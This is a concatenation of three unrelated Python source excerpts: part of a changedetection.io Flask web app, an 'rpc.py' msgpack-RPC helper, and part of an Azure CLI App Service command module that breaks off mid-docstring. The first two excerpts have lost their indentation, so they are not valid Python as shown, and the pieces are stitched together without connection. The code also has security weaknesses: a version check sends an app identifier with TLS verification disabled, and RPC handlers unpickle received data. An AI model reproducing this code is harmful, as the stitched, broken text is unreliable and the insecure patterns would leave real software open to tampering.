for uuid, watch in datastore.data['watching'].items():
if limit_tag != None:
# Support for comma separated list of tags.
for tag_in_watch in watch['tag'].split(','):
tag_in_watch = tag_in_watch.strip()
if tag_in_watch == limit_tag:
watch['uuid'] = uuid
sorted_watches.append(watch)
else:
watch['uuid'] = uuid
sorted_watches.append(watch)
sorted_watches.sort(key=lambda x: x['last_changed'], reverse=True)
existing_tags = datastore.get_all_tags()
rss = request.args.get('rss')
if rss:
fg = FeedGenerator()
fg.title('changedetection.io')
fg.description('Feed description')
fg.link(href='https://changedetection.io')
for watch in sorted_watches:
if not watch['viewed']:
fe = fg.add_entry()
fe.title(watch['url'])
fe.link(href=watch['url'])
fe.description(watch['url'])
fe.guid(watch['uuid'], permalink=False)
dt = datetime.datetime.fromtimestamp(int(watch['newest_history_key']))
dt = dt.replace(tzinfo=pytz.UTC)
fe.pubDate(dt)
response = make_response(fg.rss_str())
response.headers.set('Content-Type', 'application/rss+xml')
return response
else:
output = render_template("watch-overview.html",
watches=sorted_watches,
messages=messages,
tags=existing_tags,
active_tag=limit_tag,
has_unviewed=datastore.data['has_unviewed'])
# Show messages but once.
messages = []
return output
@app.route("/scrub", methods=['GET', 'POST'])
def scrub_page():
from pathlib import Path
global messages
if request.method == 'POST':
confirmtext = request.form.get('confirmtext')
limit_timestamp = int(request.form.get('limit_date'))
if confirmtext == 'scrub':
for uuid, watch in datastore.data['watching'].items():
if len(str(limit_timestamp)) == 10:
datastore.scrub_watch(uuid, limit_timestamp = limit_timestamp)
else:
datastore.scrub_watch(uuid)
messages.append({'class': 'ok', 'message': 'Cleaned all version history.'})
else:
messages.append({'class': 'error', 'message': 'Wrong confirm text.'})
return redirect(url_for('index'))
return render_template("scrub.html")
# If they edited an existing watch, we need to know to reset the current/previous md5 to include
# the excluded text.
def get_current_checksum_include_ignore_text(uuid):
import hashlib
from backend import fetch_site_status
# Get the most recent one
newest_history_key = datastore.get_val(uuid, 'newest_history_key')
# 0 means that theres only one, so that there should be no 'unviewed' history availabe
if newest_history_key == 0:
newest_history_key = list(datastore.data['watching'][uuid]['history'].keys())[0]
if newest_history_key:
with open(datastore.data['watching'][uuid]['history'][newest_history_key],
encoding='utf-8') as file:
raw_content = file.read()
handler = fetch_site_status.perform_site_check(datastore=datastore)
stripped_content = handler.strip_ignore_text(raw_content,
datastore.data['watching'][uuid]['ignore_text'])
checksum = hashlib.md5(stripped_content).hexdigest()
return checksum
return datastore.data['watching'][uuid]['previous_md5']
@app.route("/edit/<string:uuid>", methods=['GET', 'POST'])
def edit_page(uuid):
global messages
import validators
# More for testing, possible to return the first/only
if uuid == 'first':
uuid = list(datastore.data['watching'].keys()).pop()
if request.method == 'POST':
url = request.form.get('url').strip()
tag = request.form.get('tag').strip()
# Extra headers
form_headers = request.form.get('headers').strip().split("\n")
extra_headers = {}
if form_headers:
for header in form_headers:
if len(header):
parts = header.split(':', 1)
if len(parts) == 2:
extra_headers.update({parts[0].strip(): parts[1].strip()})
update_obj = {'url': url,
'tag': tag,
'headers': extra_headers
}
# Ignore text
form_ignore_text = request.form.get('ignore-text').strip()
ignore_text = []
if len(form_ignore_text):
for text in form_ignore_text.split("\n"):
text = text.strip()
if len(text):
ignore_text.append(text)
datastore.data['watching'][uuid]['ignore_text'] = ignore_text
# Reset the previous_md5 so we process a new snapshot including stripping ignore text.
if len(datastore.data['watching'][uuid]['history']):
update_obj['previous_md5'] = get_current_checksum_include_ignore_text(uuid=uuid)
validators.url(url) # @todo switch to prop/attr/observer
datastore.data['watching'][uuid].update(update_obj)
datastore.needs_write = True
messages.append({'class': 'ok', 'message': 'Updated watch.'})
return redirect(url_for('index'))
else:
output = render_template("edit.html", uuid=uuid, watch=datastore.data['watching'][uuid], messages=messages)
return output
@app.route("/settings", methods=['GET', "POST"])
def settings_page():
global messages
if request.method == 'POST':
try:
minutes = int(request.values.get('minutes').strip())
except ValueError:
messages.append({'class': 'error', 'message': "Invalid value given, use an integer."})
else:
if minutes >= 5:
datastore.data['settings']['requests']['minutes_between_check'] = minutes
datastore.needs_write = True
messages.append({'class': 'ok', 'message': "Updated"})
else:
messages.append(
{'class': 'error', 'message': "Must be atleast 5 minutes."})
output = render_template("settings.html", messages=messages,
minutes=datastore.data['settings']['requests']['minutes_between_check'])
messages = []
return output
@app.route("/import", methods=['GET', "POST"])
def import_page():
import validators
global messages
remaining_urls = []
good = 0
if request.method == 'POST':
urls = request.values.get('urls').split("\n")
for url in urls:
url = url.strip()
if len(url) and validators.url(url):
new_uuid = datastore.add_watch(url=url.strip(), tag="")
# Straight into the queue.
update_q.put(new_uuid)
good += 1
else:
if len(url):
remaining_urls.append(url)
messages.append({'class': 'ok', 'message': "{} Imported, {} Skipped.".format(good, len(remaining_urls))})
if len(remaining_urls) == 0:
# Looking good, redirect to index.
return redirect(url_for('index'))
# Could be some remaining, or we could be on GET
output = render_template("import.html",
messages=messages,
remaining="\n".join(remaining_urls)
)
messages = []
return output
# Clear all statuses, so we do not see the 'unviewed' class
@app.route("/api/mark-all-viewed", methods=['GET'])
def mark_all_viewed():
# Save the current newest history as the most recently viewed
for watch_uuid, watch in datastore.data['watching'].items():
datastore.set_last_viewed(watch_uuid, watch['newest_history_key'])
messages.append({'class': 'ok', 'message': "Cleared all statuses."})
return redirect(url_for('index'))
@app.route("/diff/<string:uuid>", methods=['GET'])
def diff_history_page(uuid):
global messages
# More for testing, possible to return the first/only
if uuid == 'first':
uuid = list(datastore.data['watching'].keys()).pop()
extra_stylesheets = ['/static/css/diff.css']
try:
watch = datastore.data['watching'][uuid]
except KeyError:
messages.append({'class': 'error', 'message': "No history found for the specified link, bad link?"})
return redirect(url_for('index'))
dates = list(watch['history'].keys())
# Convert to int, sort and back to str again
dates = [int(i) for i in dates]
dates.sort(reverse=True)
dates = [str(i) for i in dates]
if len(dates) < 2:
messages.append(
{'class': 'error', 'message': "Not enough saved change detection snapshots to produce a report."})
return redirect(url_for('index'))
# Save the current newest history as the most recently viewed
datastore.set_last_viewed(uuid, dates[0])
newest_file = watch['history'][dates[0]]
with open(newest_file, 'r') as f:
newest_version_file_contents = f.read()
previous_version = request.args.get('previous_version')
try:
previous_file = watch['history'][previous_version]
except KeyError:
# Not present, use a default value, the second one in the sorted list.
previous_file = watch['history'][dates[1]]
with open(previous_file, 'r') as f:
previous_version_file_contents = f.read()
output = render_template("diff.html", watch_a=watch,
messages=messages,
newest=newest_version_file_contents,
previous=previous_version_file_contents,
extra_stylesheets=extra_stylesheets,
versions=dates[1:],
newest_version_timestamp=dates[0],
current_previous_version=str(previous_version),
current_diff_url=watch['url'])
return output
@app.route("/preview/<string:uuid>", methods=['GET'])
def preview_page(uuid):
global messages
# More for testing, possible to return the first/only
if uuid == 'first':
uuid = list(datastore.data['watching'].keys()).pop()
extra_stylesheets = ['/static/css/diff.css']
try:
watch = datastore.data['watching'][uuid]
except KeyError:
messages.append({'class': 'error', 'message': "No history found for the specified link, bad link?"})
return redirect(url_for('index'))
print(watch)
with open(list(watch['history'].values())[-1], 'r') as f:
content = f.readlines()
output = render_template("preview.html", content=content, extra_stylesheets=extra_stylesheets)
return output
@app.route("/favicon.ico", methods=['GET'])
def favicon():
return send_from_directory("/app/static/images", filename="favicon.ico")
# We're good but backups are even better!
@app.route("/backup", methods=['GET'])
def get_backup():
import zipfile
from pathlib import Path
# create a ZipFile object
backupname = "changedetection-backup-{}.zip".format(int(time.time()))
# We only care about UUIDS from the current index file
uuids = list(datastore.data['watching'].keys())
backup_filepath = os.path.join(app.config['datastore_path'], backupname)
with zipfile.ZipFile(backup_filepath, "w",
compression=zipfile.ZIP_DEFLATED,
compresslevel=8) as zipObj:
# Be sure we're written fresh
datastore.sync_to_json()
# Add the index
zipObj.write(os.path.join(app.config['datastore_path'], "url-watches.json"), arcname="url-watches.json")
# Add any snapshot data we find, use the full path to access the file, but make the file 'relative' in the Zip.
for txt_file_path in Path(app.config['datastore_path']).rglob('*.txt'):
parent_p = txt_file_path.parent
if parent_p.name in uuids:
zipObj.write(txt_file_path,
arcname=str(txt_file_path).replace(app.config['datastore_path'], ''),
compress_type=zipfile.ZIP_DEFLATED,
compresslevel=8)
return send_from_directory(app.config['datastore_path'], backupname)
@app.route("/static/<string:group>/<string:filename>", methods=['GET'])
def static_content(group, filename):
# These files should be in our subdirectory
full_path = os.path.realpath(__file__)
p = os.path.dirname(full_path)
try:
return send_from_directory("{}/static/{}".format(p, group), filename=filename)
except FileNotFoundError:
abort(404)
@app.route("/api/add", methods=['POST'])
def api_watch_add():
global messages
url = request.form.get('url').strip()
if datastore.url_exists(url):
messages.append({'class': 'error', 'message': 'The URL {} already exists'.format(url)})
return redirect(url_for('index'))
# @todo add_watch should throw a custom Exception for validation etc
new_uuid = datastore.add_watch(url=url, tag=request.form.get('tag').strip())
# Straight into the queue.
update_q.put(new_uuid)
messages.append({'class': 'ok', 'message': 'Watch added.'})
return redirect(url_for('index'))
@app.route("/api/delete", methods=['GET'])
def api_delete():
global messages
uuid = request.args.get('uuid')
datastore.delete(uuid)
messages.append({'class': 'ok', 'message': 'Deleted.'})
return redirect(url_for('index'))
@app.route("/api/checknow", methods=['GET'])
def api_watch_checknow():
global messages
tag = request.args.get('tag')
uuid = request.args.get('uuid')
i = 0
running_uuids = []
for t in running_update_threads:
running_uuids.append(t.current_uuid)
# @todo check thread is running and skip
if uuid:
if uuid not in running_uuids:
update_q.put(uuid)
i = 1
elif tag != None:
# Items that have this current tag
for watch_uuid, watch in datastore.data['watching'].items():
if (tag != None and tag in watch['tag']):
if watch_uuid not in running_uuids and not datastore.data['watching'][watch_uuid]['paused']:
update_q.put(watch_uuid)
i += 1
else:
# No tag, no uuid, add everything.
for watch_uuid, watch in datastore.data['watching'].items():
if watch_uuid not in running_uuids and not datastore.data['watching'][watch_uuid]['paused']:
update_q.put(watch_uuid)
i += 1
messages.append({'class': 'ok', 'message': "{} watches are rechecking.".format(i)})
return redirect(url_for('index', tag=tag))
# @todo handle ctrl break
ticker_thread = threading.Thread(target=ticker_thread_check_time_launch_checks).start()
# Check for new release version
threading.Thread(target=check_for_new_version).start()
return app
# Check for new version and anonymous stats
def check_for_new_version():
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
while not app.config.exit.is_set():
try:
r = requests.post("https://changedetection.io/check-ver.php",
data={'version': datastore.data['version_tag'],
'app_guid': datastore.data['app_guid']},
verify=False)
except:
pass
try:
if "new_version" in r.text:
app.config['NEW_VERSION_AVAILABLE'] = True
except:
pass
# Check daily
app.config.exit.wait(86400)
# Requests for checking on the site use a pool of thread Workers managed by a Queue.
class Worker(threading.Thread):
current_uuid = None
def __init__(self, q, *args, **kwargs):
self.q = q
super().__init__(*args, **kwargs)
def run(self):
from backend import fetch_site_status
update_handler = fetch_site_status.perform_site_check(datastore=datastore)
while not app.config.exit.is_set():
try:
uuid = self.q.get(block=False)
except queue.Empty:
pass
else:
self.current_uuid = uuid
if uuid in list(datastore.data['watching'].keys()):
try:
changed_detected, result, contents = update_handler.run(uuid)
except PermissionError as s:
app.logger.error("File permission error updating", uuid, str(s))
else:
if result:
datastore.update_watch(uuid=uuid, update_obj=result)
if changed_detected:
# A change was detected
datastore.save_history_text(uuid=uuid, contents=contents, result_obj=result)
self.current_uuid = None # Done
self.q.task_done()
app.config.exit.wait(1)
# Thread runner to check every minute, look for new watches to feed into the Queue.
def ticker_thread_check_time_launch_checks():
# Spin up Workers.
for _ in range(datastore.data['settings']['requests']['workers']):
new_worker = Worker(update_q)
running_update_threads.append(new_worker)
new_worker.start()
while not app.config.exit.is_set():
running_uuids = []
for t in running_update_threads:
if t.current_uuid:
running_uuids.append(t.current_uuid)
# Look at the dataset, find a stale watch to process
# Every minute check for new UUIDs to follow up on, should be inside the loop incase it changes.
minutes = datastore.data['settings']['requests']['minutes_between_check']
threshold = time.time() - (minutes * 60)
for uuid, watch in datastore.data['watching'].items():
if not watch['paused'] and watch['last_checked'] <= threshold:
if not uuid in running_uuids and uuid not in update_q.queue:
update_q.put(uuid)
# Should be low so we can break this out in testing
app.config.exit.wait(1)
|
rpc.py | import threading
import pickle
import sys
import logging
import msgpackrpc
import tblib
import uuid
import functools
logger = logging.getLogger(__name__)
class Base(object):
def __init__(self):
self._server = msgpackrpc.Server(self)
self._blocking_thread = None
self._id = str(uuid.uuid1())
def start(self):
self._server.listen(msgpackrpc.Address("127.0.0.1", 0))
self._blocking_thread = threading.Thread(target=self._server.start)
self._blocking_thread.start()
logger.debug("server {} started".format(self._id))
def join(self, timeout=None):
self._blocking_thread.join(timeout)
def ensure_stopped(self, timeout=None):
self._server.stop()
self._blocking_thread.join(timeout)
logger.debug("server {} stopped".format(self._id))
def get_port(self):
return list(self._server._listeners[0]._mp_server._sockets.values())[0].getsockname()[1]
def get_id(self):
return self._id
class ServerMixin(object):
def wait_for_worker(self, timeout=None):
self._client_ack_event.wait(timeout)
assert self._client_ack_event.is_set()
def ack(self, client_port):
logger.debug("server {} got ack".format(self._id))
self._client_port = client_port
self._client_ack_event.set()
def log(self, log_record):
try:
record = pickle.loads(log_record)
if record.exc_info:
record.exc_info = (record.exc_info[0], record.exc_info[1], tblib.Traceback(record.exc_info[2].as_traceback()))
logging.getLogger(record.name).handle(record)
except:
pass
def get_child_port(self):
return self._client_port
class Server(Base, ServerMixin):
def __init__(self):
super(Server, self).__init__()
self._client_ack_event = threading.Event()
self._client_port = None
def rpc_result(func):
from infi.traceback import traceback_decorator
@traceback_decorator
@functools.wraps(func)
def wrapper(*args, **kwargs):
try:
result = dict(code='success', result=func(*args, **kwargs))
except:
logger.exception("Exception in child rpc_result")
_type, value, _tb = sys.exc_info()
exc_info = (_type, value, tblib.Traceback(_tb))
result = dict(code='error', result=exc_info)
logger.debug("returning {!r} for".format(result))
return pickle.dumps(result)
return wrapper
class ChildServerMixin(object):
@rpc_result
def run_method(self, instance, method_name, args, kwargs):
instance = pickle.loads(instance)
method_name = pickle.loads(method_name)
args = pickle.loads(args)
kwargs = pickle.loads(kwargs)
method = getattr(instance, method_name)
logger.debug("running {!r} {!r} {!r}".format(method, args, kwargs))
return method(*args, **kwargs)
@rpc_result
def run_func(self, target, args, kwargs):
target = pickle.loads(target)
args = pickle.loads(args)
kwargs = pickle.loads(kwargs)
logger.debug("running {!r} {!r} {!r}".format(target, args, kwargs))
return target(*args, **kwargs)
def shutdown(self):
logger.debug('child server {!r} shutting down'.format(self.get_id()))
self._server.close()
self._server.stop()
class ChildServer(Base, ChildServerMixin):
pass
class Client(msgpackrpc.Client):
def __init__(self, port, timeout=None):
super(Client, self).__init__(msgpackrpc.Address("127.0.0.1", port), timeout=timeout)
self._port = port
def get_port(self):
return self._port
timeout_exceptions = (msgpackrpc.error.TimeoutError, )
|
custom.py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
import threading
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse # pylint: disable=import-error
from binascii import hexlify
from os import urandom
import OpenSSL.crypto
from msrestazure.azure_exceptions import CloudError
from msrestazure.tools import is_valid_resource_id, parse_resource_id
from azure.mgmt.storage import StorageManagementClient
from azure.mgmt.web.models import (Site, SiteConfig, User, AppServicePlan, SiteConfigResource,
SkuDescription, SslState, HostNameBinding, NameValuePair,
BackupRequest, DatabaseBackupSetting, BackupSchedule,
RestoreRequest, FrequencyUnit, Certificate, HostNameSslState,
RampUpRule, UnauthenticatedClientAction)
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.cli.core.commands import LongRunningOperation
from azure.cli.core.prompting import prompt_pass, NoTTYException
import azure.cli.core.azlogging as azlogging
from azure.cli.core.util import CLIError
from .vsts_cd_provider import VstsContinuousDeliveryProvider
from ._params import _generic_site_operation, _generic_settings_operation, AUTH_TYPES
from ._client_factory import web_client_factory, ex_handler_factory
logger = azlogging.get_az_logger(__name__)
# pylint:disable=no-member,too-many-lines,too-many-locals
def create_webapp(resource_group_name, name, plan, runtime=None, startup_file=None,
deployment_container_image_name=None, deployment_source_url=None, deployment_source_branch='master',
deployment_local_git=None):
if deployment_source_url and deployment_local_git:
raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
client = web_client_factory()
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
is_linux = plan_info.reserved
location = plan_info.location
site_config = SiteConfig(app_settings=[])
webapp_def = Site(server_farm_id=plan_info.id, location=location, site_config=site_config)
if is_linux:
if runtime and deployment_container_image_name:
raise CLIError('usage error: --runtime | --deployment-container-image-name')
if startup_file:
site_config.app_command_line = startup_file
if runtime:
site_config.linux_fx_version = runtime
elif deployment_container_image_name:
site_config.linux_fx_version = _format_linux_fx_version(deployment_container_image_name)
site_config.app_settings.append(NameValuePair("WEBSITES_ENABLE_APP_SERVICE_STORAGE", "false"))
else: # must specify runtime
raise CLIError('usage error: must specify --runtime | --deployment-container-image-name') # pylint: disable=line-too-long
elif runtime: # windows webapp
if startup_file or deployment_container_image_name:
raise CLIError("usage error: --startup-file or --deployment-container-image-name is "
"only appliable on linux webapp")
helper = _StackRuntimeHelper(client)
match = helper.resolve(runtime)
if not match:
raise CLIError("Runtime '{}' is not supported. Please invoke 'list-runtimes' to cross check".format(runtime)) # pylint: disable=line-too-long
match['setter'](match, site_config)
# Be consistent with portal: any windows webapp should have this even it doesn't have node in the stack
if not match['displayName'].startswith('node'):
site_config.app_settings.append(NameValuePair("WEBSITE_NODE_DEFAULT_VERSION", "6.9.1"))
if site_config.app_settings:
for setting in site_config.app_settings:
logger.info('Will set appsetting %s', setting)
poller = client.web_apps.create_or_update(resource_group_name, name, webapp_def)
webapp = LongRunningOperation()(poller)
# Ensure SCC operations follow right after the 'create', no precedent appsetting update commands
_set_remote_or_local_git(webapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
_fill_ftp_publishing_url(webapp, resource_group_name, name)
return webapp
def show_webapp(resource_group_name, name, slot=None, app_instance=None):
webapp = app_instance
if not app_instance: # when the routine is invoked as a help method, not through commands
webapp = _generic_site_operation(resource_group_name, name, 'get', slot)
_rename_server_farm_props(webapp)
_fill_ftp_publishing_url(webapp, resource_group_name, name, slot)
return webapp
def update_webapp(instance, client_affinity_enabled=None):
if client_affinity_enabled is not None:
instance.client_affinity_enabled = client_affinity_enabled == 'true'
return instance
def list_webapp(resource_group_name=None):
return _list_app(['app', 'app,linux'], resource_group_name)
def list_function_app(resource_group_name=None):
return _list_app(['functionapp', 'functionapp,linux'], resource_group_name)
def _list_app(app_types, resource_group_name=None):
client = web_client_factory()
if resource_group_name:
result = list(client.web_apps.list_by_resource_group(resource_group_name))
else:
result = list(client.web_apps.list())
result = [x for x in result if x.kind in app_types]
for webapp in result:
_rename_server_farm_props(webapp)
return result
def get_auth_settings(resource_group_name, name, slot=None):
return _generic_site_operation(resource_group_name, name, 'get_auth_settings', slot)
def update_auth_settings(resource_group_name, name, enabled=None, action=None, # pylint: disable=unused-argument
client_id=None, token_store_enabled=None, # pylint: disable=unused-argument
runtime_version=None, token_refresh_extension_hours=None, # pylint: disable=unused-argument
allowed_external_redirect_urls=None, client_secret=None, # pylint: disable=unused-argument
allowed_audiences=None, issuer=None, facebook_app_id=None, # pylint: disable=unused-argument
facebook_app_secret=None, facebook_oauth_scopes=None, # pylint: disable=unused-argument
twitter_consumer_key=None, twitter_consumer_secret=None, # pylint: disable=unused-argument
google_client_id=None, google_client_secret=None, # pylint: disable=unused-argument
google_oauth_scopes=None, microsoft_account_client_id=None, # pylint: disable=unused-argument
microsoft_account_client_secret=None, # pylint: disable=unused-argument
microsoft_account_oauth_scopes=None, slot=None): # pylint: disable=unused-argument
auth_settings = get_auth_settings(resource_group_name, name, slot)
if action == 'AllowAnonymous':
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.allow_anonymous
elif action:
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.redirect_to_login_page
auth_settings.default_provider = AUTH_TYPES[action]
import inspect
frame = inspect.currentframe()
bool_flags = ['enabled', 'token_store_enabled']
# note: getargvalues is used already in azure.cli.core.commands.
# and no simple functional replacement for this deprecating method for 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[2:]:
print(arg, values[arg])
if values.get(arg, None):
setattr(auth_settings, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
return _generic_site_operation(resource_group_name, name, 'update_auth_settings', slot, auth_settings)
def list_runtimes(linux=False):
client = web_client_factory()
if linux:
# workaround before API is exposed
logger.warning('You are viewing an offline list of runtimes. For up to date list, '
'check out https://aka.ms/linux-stacks')
return ['node|6.4', 'node|4.5', 'node|6.2', 'node|6.6', 'node|6.9', 'node|6.10',
'php|5.6', 'php|7.0', 'dotnetcore|1.0', 'dotnetcore|1.1', 'ruby|2.3']
runtime_helper = _StackRuntimeHelper(client)
return [s['displayName'] for s in runtime_helper.stacks]
def _rename_server_farm_props(webapp):
# Should be renamed in SDK in a future release
setattr(webapp, 'app_service_plan_id', webapp.server_farm_id)
del webapp.server_farm_id
return webapp
def delete_function_app(resource_group_name, name, slot=None):
return _generic_site_operation(resource_group_name, name, 'delete', slot)
def delete_webapp(resource_group_name, name, keep_metrics=None, keep_empty_plan=None,
keep_dns_registration=None, slot=None):
client = web_client_factory()
delete_method = getattr(client.web_apps, 'delete' if slot is None else 'delete_slot')
delete_method(resource_group_name, name,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None,
skip_dns_registration=False if keep_dns_registration else None)
def stop_webapp(resource_group_name, name, slot=None):
return _generic_site_operation(resource_group_name, name, 'stop', slot)
def start_webapp(resource_group_name, name, slot=None):
return _generic_site_operation(resource_group_name, name, 'start', slot)
def restart_webapp(resource_group_name, name, slot=None):
return _generic_site_operation(resource_group_name, name, 'restart', slot)
def get_site_configs(resource_group_name, name, slot=None):
return _generic_site_operation(resource_group_name, name, 'get_configuration', slot)
def get_app_settings(resource_group_name, name, slot=None):
result = _generic_site_operation(resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory()
slot_app_setting_names = client.web_apps.list_slot_configuration_names(resource_group_name, name).app_setting_names
return _build_app_settings_output(result.properties, slot_app_setting_names)
def get_connection_strings(resource_group_name, name, slot=None):
result = _generic_site_operation(resource_group_name, name, 'list_connection_strings', slot)
client = web_client_factory()
slot_constr_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.connection_string_names or []
result = [{'name': p,
'value': result.properties[p],
'slotSetting': p in slot_constr_names} for p in result.properties]
return result
def _fill_ftp_publishing_url(webapp, resource_group_name, name, slot=None):
profiles = list_publish_profiles(resource_group_name, name, slot)
url = next(p['publishUrl'] for p in profiles if p['publishMethod'] == 'FTP')
setattr(webapp, 'ftpPublishingUrl', url)
return webapp
def _format_linux_fx_version(custom_image_name):
fx_version = custom_image_name.strip()
fx_version_lower = fx_version.lower()
# handles case of only spaces
if fx_version:
if not fx_version_lower.startswith('docker|'):
fx_version = '{}|{}'.format('DOCKER', custom_image_name)
else:
fx_version = ' '
return fx_version
def _add_linux_fx_version(resource_group_name, name, custom_image_name, slot=None):
fx_version = _format_linux_fx_version(custom_image_name)
return update_site_configs(resource_group_name, name, linux_fx_version=fx_version, slot=slot)
def _delete_linux_fx_version(resource_group_name, name, slot=None):
fx_version = ' '
return update_site_configs(resource_group_name, name, linux_fx_version=fx_version, slot=slot)
def _get_linux_fx_version(resource_group_name, name, slot=None):
site_config = get_site_configs(resource_group_name, name, slot)
return site_config.linux_fx_version
# for any modifications to the non-optional parameters, adjust the reflection logic accordingly
# in the method
def update_site_configs(resource_group_name, name, slot=None,
linux_fx_version=None, php_version=None, python_version=None, # pylint: disable=unused-argument
net_framework_version=None, # pylint: disable=unused-argument
java_version=None, java_container=None, java_container_version=None, # pylint: disable=unused-argument
remote_debugging_enabled=None, web_sockets_enabled=None, # pylint: disable=unused-argument
always_on=None, auto_heal_enabled=None, # pylint: disable=unused-argument
use32_bit_worker_process=None, # pylint: disable=unused-argument
app_command_line=None): # pylint: disable=unused-argument
configs = get_site_configs(resource_group_name, name, slot)
if linux_fx_version:
if linux_fx_version.strip().lower().startswith('docker|'):
update_app_settings(resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE=false"])
else:
delete_app_settings(resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE"])
import inspect
frame = inspect.currentframe()
bool_flags = ['remote_debugging_enabled', 'web_sockets_enabled', 'always_on',
'auto_heal_enabled', 'use32_bit_worker_process']
# note: getargvalues is used already in azure.cli.core.commands.
# and no simple functional replacement for this deprecating method for 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[3:]:
if values.get(arg, None):
setattr(configs, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
return _generic_site_operation(resource_group_name, name, 'update_configuration', slot, configs)
def update_app_settings(resource_group_name, name, settings=None, slot=None, slot_settings=None):
    """Create or update app settings; entries given via slot_settings become slot-sticky."""
    if not settings and not slot_settings:
        raise CLIError('Usage Error: --settings |--slot-settings')
    app_settings = _generic_site_operation(resource_group_name, name,
                                           'list_application_settings', slot)
    for pair in (settings or []) + (slot_settings or []):
        # split at the first '=' only, since an appsetting name cannot contain '='
        key, value = pair.split('=', 1)
        app_settings.properties[key] = value
    client = web_client_factory()
    result = _generic_settings_operation(resource_group_name, name,
                                         'update_application_settings',
                                         app_settings.properties, slot, client)
    sticky_names = []
    if slot_settings:
        slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
        existing = slot_cfg_names.app_setting_names or []
        slot_cfg_names.app_setting_names = existing + [s.split('=', 1)[0] for s in slot_settings]
        sticky_names = slot_cfg_names.app_setting_names
        client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
    return _build_app_settings_output(result.properties, sticky_names)
def delete_app_settings(resource_group_name, name, setting_names, slot=None):
    """Remove the given app settings; also drop them from the slot-sticky name list."""
    app_settings = _generic_site_operation(resource_group_name, name, 'list_application_settings', slot)
    client = web_client_factory()
    slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
    sticky_changed = False
    for candidate in setting_names:
        app_settings.properties.pop(candidate, None)
        if slot_cfg_names.app_setting_names and candidate in slot_cfg_names.app_setting_names:
            slot_cfg_names.app_setting_names.remove(candidate)
            sticky_changed = True
    if sticky_changed:
        # only round-trip the sticky-name list when it actually changed
        client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
    result = _generic_settings_operation(resource_group_name, name,
                                         'update_application_settings',
                                         app_settings.properties, slot, client)
    return _build_app_settings_output(result.properties, slot_cfg_names.app_setting_names)
def _build_app_settings_output(app_settings, slot_cfg_names):
    """Shape a name->value settings dict into a list of {name, value, slotSetting} records."""
    sticky = slot_cfg_names or []
    output = []
    for key in _mask_creds_related_appsettings(app_settings):
        output.append({'name': key,
                       'value': app_settings[key],
                       'slotSetting': key in sticky})
    return output
def update_connection_strings(resource_group_name, name, connection_string_type,
                              settings=None, slot=None, slot_settings=None):
    """Create or update connection strings; slot_settings entries become slot-sticky."""
    from azure.mgmt.web.models import ConnStringValueTypePair
    if not settings and not slot_settings:
        raise CLIError('Usage Error: --settings |--slot-settings')
    conn_strings = _generic_site_operation(resource_group_name, name,
                                           'list_connection_strings', slot)
    for pair in (settings or []) + (slot_settings or []):
        # split at the first '=' only; the value itself may contain '='
        key, value = pair.split('=', 1)
        if value[0] in ("'", '"'):  # strip away the quotes used as separators
            value = value[1:-1]
        conn_strings.properties[key] = ConnStringValueTypePair(value, connection_string_type)
    client = web_client_factory()
    result = _generic_settings_operation(resource_group_name, name,
                                         'update_connection_strings',
                                         conn_strings.properties, slot, client)
    if slot_settings:
        sticky = client.web_apps.list_slot_configuration_names(resource_group_name, name)
        sticky.connection_string_names = ((sticky.connection_string_names or []) +
                                          [s.split('=', 1)[0] for s in slot_settings])
        client.web_apps.update_slot_configuration_names(resource_group_name, name, sticky)
    return result.properties
def delete_connection_strings(resource_group_name, name, setting_names, slot=None):
    """Delete the given connection strings; also drop them from the slot-sticky list."""
    conn_strings = _generic_site_operation(resource_group_name, name,
                                           'list_connection_strings', slot)
    client = web_client_factory()
    slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
    sticky_changed = False
    for candidate in setting_names:
        conn_strings.properties.pop(candidate, None)
        if slot_cfg_names.connection_string_names and candidate in slot_cfg_names.connection_string_names:
            slot_cfg_names.connection_string_names.remove(candidate)
            sticky_changed = True
    if sticky_changed:
        client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
    return _generic_settings_operation(resource_group_name, name,
                                       'update_connection_strings',
                                       conn_strings.properties, slot, client)
# App settings that make up a web app's container (Docker) configuration.
CONTAINER_APPSETTING_NAMES = ['DOCKER_REGISTRY_SERVER_URL', 'DOCKER_REGISTRY_SERVER_USERNAME',
                              'DOCKER_REGISTRY_SERVER_PASSWORD', "WEBSITES_ENABLE_APP_SERVICE_STORAGE"]
# Settings whose values are secrets; they are masked before being shown to the user.
APPSETTINGS_TO_MASK = ['DOCKER_REGISTRY_SERVER_PASSWORD']
def update_container_settings(resource_group_name, name, docker_registry_server_url=None,
                              docker_custom_image_name=None, docker_registry_server_user=None,
                              websites_enable_app_service_storage=None, docker_registry_server_password=None,
                              slot=None):
    """Update the container (Docker) configuration of a web app.

    Builds DOCKER_* app settings from the supplied arguments. When the registry
    is an Azure Container Registry and no credential was given, an admin
